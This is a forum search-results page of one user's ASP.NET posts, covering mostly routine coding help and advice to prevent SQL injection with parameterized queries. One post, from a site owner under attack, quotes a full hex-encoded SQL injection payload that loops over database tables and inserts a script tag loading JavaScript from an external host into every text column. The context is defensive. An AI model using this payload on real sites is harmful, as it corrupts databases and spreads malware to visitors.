You searched for the word(s): userid:773977

More Search Options

RSS Available

• Re: How to stop SQL Injection?

  Hi, Even I had same problem and got answer :- http://forums.asp.net/t/1299987.aspx Simple and easy would be use sqlparameters objects. Also for detailed reading see http://en.wikipedia.org/wiki/SQL_injection

  Posted to Security (Forum) by dinesh_sp on 8/11/2008

• Re: SQL Injection Attacks

  My site was also under attack and posted on this forum http://forums.asp.net/t/1299987.aspx The simple and easy solution is sqlparameters as described here http://en.wikipedia.org/wiki/SQL_injection

  Posted to Security (Forum) by dinesh_sp on 8/11/2008

• Re: Hacking via Querystring.

  http://en.wikipedia.org/wiki/SQL_injection Detailed article on sql injection and how to prevent it. Thank you to all posters.

  Posted to Security (Forum) by dinesh_sp on 8/11/2008

• Re: Hacking via Querystring.

  Thanks for your quick reply steve, But what do you mean when you say [quote user="SGWellens"]Do not pass SQL statements that are to be executed in query strings[/quote] Basically my page reads querystring, then fetches the database and shows the result, so in that regards how can this be done. Basically its all hyperlinked, and works on querystring, like eg: a=1&b=2&c=3. So the page gets results accordingly. Now at this point of time, when website is already running, I cant change

  Posted to Security (Forum) by dinesh_sp on 8/4/2008

• Hacking via Querystring.

  Hi Gurus, My website is under attack, and someone is trying to hack via querystring. All his attempts have failed but this is what he is trying to do. http://XXXX.com/XXX/page.aspx ?tab=1&catid=32&subid=67;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E6E6A65702E72752F6A732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220

  Posted to Security (Forum) by dinesh_sp on 8/3/2008

• Re: A way to create a dialog popup?

  Hi There are 2 ways to do that in Javascript:- 1) < asp : Button ID ="Button3" runat ="server" Text ="Button" OnClientClick ="return confirm('R U Sure?');" /></ div > or 2) Button3.Attributes.Add("onclick", "return confirm('R u Sure');") Hope this helps.

  Posted to Getting Started (Forum) by dinesh_sp on 6/10/2008

• Re: Sending Emails through website

  Leave your web.config as it is and chage your code Dim mail As New MailMessage() 'set the addresses mail.From = New MailAddress(" me@mycompany.com ") mail.To.Add(" you@yourcompany.com ") 'set the content mail.Subject = "This is an email" mail.Body = "this is a sample body with html in it. <b>This is bold</b> <font color=#336699>This is blue</font>" mail.IsBodyHtml = True 'send the message Dim smtp As New SmtpClient() smtp

  Posted to Getting Started (Forum) by dinesh_sp on 6/4/2008

• Re: A strange problem with redirects or sessions

  Try removing buffer=0 and put response.expires=0, enableviewstate=false and enableviewstaemac as false in web.config. Enableviewstate and enableviewstatemac are causing you worries. If this solves than its ok, but if it doesnt you need to look at another solution for 'Unable to validate data' and remove changes that you made in web.config

  Posted to Getting Started (Forum) by dinesh_sp on 6/4/2008

• Re: Strange characters after submitting a form

  Hi, Have you specified the culture tag in web.config <system.web> <globalization uiCulture="en" culture="en-GB" /> //example of Great Britain--please change to Greek </system.web> What may be happening, is that remote server still thinks your culture is english, but when you specify in web.config to greek culture, that would ask it to interpret greek characters. If you have, It can also be a browser issue where browser language is set to english US.

  Posted to Getting Started (Forum) by dinesh_sp on 6/4/2008

• Re: configurationmanager.appsettings vb.net 2005

  [quote user="goh6613"] but this does not work ============== Public Function XMLPath() As String Return ConfigurationManager.AppSettings("XMLPath") End Function ============= [/quote] For this to work you need to write app key and value in web.config. When you dont have anything in appsettings, it wont return anything < appSettings > < add key = "XMLPath " value = " D:\AJAXEnabledWebSite1\xml\ " /> </ appSettings > Hope this helps.

  Posted to Getting Started (Forum) by dinesh_sp on 6/4/2008